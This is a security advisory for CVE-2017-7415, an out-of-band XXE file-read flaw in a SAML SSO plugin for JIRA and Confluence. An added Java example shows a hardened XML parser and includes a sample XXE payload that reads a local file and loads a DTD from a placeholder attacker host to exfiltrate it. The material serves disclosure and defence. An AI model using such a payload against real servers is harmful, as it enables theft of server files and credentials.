SAML Single Sign On Security Advisories

2017-05-23-01 XXE Out Of Band Extraction Vulnerability

Summary: CVE-2017-7415 - XXE Out Of Band Extraction Vulnerability
Advisory Release Date: 23 May 2017
Product: SAML Single Sign On (SSO) for JIRA; SAML Single Sign On (SSO) for Confluence
Affected SAML SSO versions: 0.14 - 0.14.6 (inclusive)
Fixed SAML SSO versions: 0.14.7 and above contain a fix for this issue.
The SAML Single Sign On (SSO) for Bitbucket plugin is not affected.
CVE ID(s): CVE-2017-7415

Summary of Vulnerability
This advisory discloses a medium severity security vulnerability affecting SAML Single Sign On plugin versions 0.14 - 0.14.6 for JIRA and Confluence. Please upgrade your installations immediately to fix this vulnerability. Versions before 0.14 are not affected.
Any authenticated user can extract file system content from the JIRA or Confluence server via an out-of-band XXE attack.

Severity
resolution rates the severity of this vulnerability as medium, according to the CVSS v3.0 specification.
Severity: Medium
Temporal Score: 6.0 (base score 6.5)
Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:F/RL:O/RC:C
This is an independent assessment and you should evaluate its applicability to your own IT environment.

Description
A REST API endpoint in the Confluence and JIRA plugins parses XML responses with a DocumentBuilder that is not configured to reject DOCTYPE declarations or external entities, so the parser resolves entities supplied in the submitted document (XXE). Because the endpoint does not need to echo the parsed content back to the caller, the attack works out of band: an entity declaration makes the server read a local file and pass its contents to an attacker-controlled host. The end result is that any authenticated user can read arbitrary files from the JIRA or Confluence server's file system that the application user can read, including configuration files, passwords, etc.

Acknowledgements
This vulnerability was disclosed to us via a third-party organisation as a responsible disclosure on 22.05.2017 23:55 CET. Further credits TBD.

Fix
We have taken the following steps to address this issue:
Released SAML plugin version 0.14.7, which contains a fix for this issue.

What You Need to Do
Upgrade to SAML plugin version 0.14.7 or higher.

Support
If you have questions or concerns regarding this advisory, please raise a support request via our Support Portal.
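The following is an added example and is not code from the advisory or from the plugin itself. It shows the difference between a DocumentBuilder built with factory defaults, the pattern the description refers to, and one hardened against XXE, and runs the hardened parser against a constructed out-of-band XXE document of the kind the advisory describes. The class name, the sample documents, the file path and the host name attacker.invalid are assumptions made for illustration; the endpoint, the exact payload and the DTD the real finding used are not disclosed on this page and are not reproduced here.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class XxeHardeningExample {

    // Constructed sample input, not taken from the advisory: the general shape of an
    // out-of-band XXE document. The parameter entity %dtd points at an attacker-hosted
    // DTD which would declare an entity that embeds the contents of %file in a URL and
    // fetches it, so the data leaves the server even when the endpoint never echoes the
    // parsed XML. attacker.invalid is a reserved placeholder name and resolves nowhere.
    static final String OOB_XXE_SAMPLE =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE data [\n" +
        "  <!ENTITY % file SYSTEM \"file:///etc/hostname\">\n" +
        "  <!ENTITY % dtd SYSTEM \"http://attacker.invalid/oob.dtd\">\n" +
        "  %dtd;\n" +
        "]>\n" +
        "<data>&exfil;</data>\n";

    // Constructed harmless document that such an endpoint would legitimately accept.
    static final String BENIGN_SAMPLE =
        "<?xml version=\"1.0\"?><data><value>hello</value></data>";

    // The unsafe pattern: a DocumentBuilder built with factory defaults. Depending on
    // the JDK and parser, the defaults resolve external general and parameter entities
    // and fetch external DTDs, which is what an XXE payload relies on.
    static DocumentBuilder unsafeBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened configuration. disallow-doctype-decl alone rejects any DOCTYPE and
    // therefore any entity declaration; the remaining settings are defence in depth
    // for parsers that ignore that feature.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns true if the builder accepted the document, false if it rejected it.
    static boolean accepts(DocumentBuilder builder, String xml) {
        try {
            Document doc = builder.parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement() != null;
        } catch (SAXException | IOException e) {
            System.out.println("  rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws ParserConfigurationException {
        System.out.println("hardened parser, benign document:");
        System.out.println("  accepted = " + accepts(hardenedBuilder(), BENIGN_SAMPLE));

        // The hardened parser refuses the DOCTYPE before any entity is resolved,
        // so neither the local file read nor the outbound request happens.
        System.out.println("hardened parser, OOB XXE document:");
        System.out.println("  accepted = " + accepts(hardenedBuilder(), OOB_XXE_SAMPLE));

        // The unsafe parser is deliberately not fed the XXE sample here: it would read
        // the local file and attempt an outbound HTTP request, which is the behaviour
        // the advisory describes and the fixed version removes.
        System.out.println("unsafe parser, benign document:");
        System.out.println("  accepted = " + accepts(unsafeBuilder(), BENIGN_SAMPLE));
    }
}
```

Compile and run with `javac XxeHardeningExample.java && java XxeHardeningExample`; the hardened parser prints "accepted = true" for the benign document and "accepted = false" with a "DOCTYPE is disallowed" message for the XXE document. When auditing a plugin for this class of bug, grep for `DocumentBuilderFactory.newInstance()`, `SAXParserFactory.newInstance()` and `XMLInputFactory.newInstance()` and check that every instance sets these features before a user-controlled document reaches `parse`.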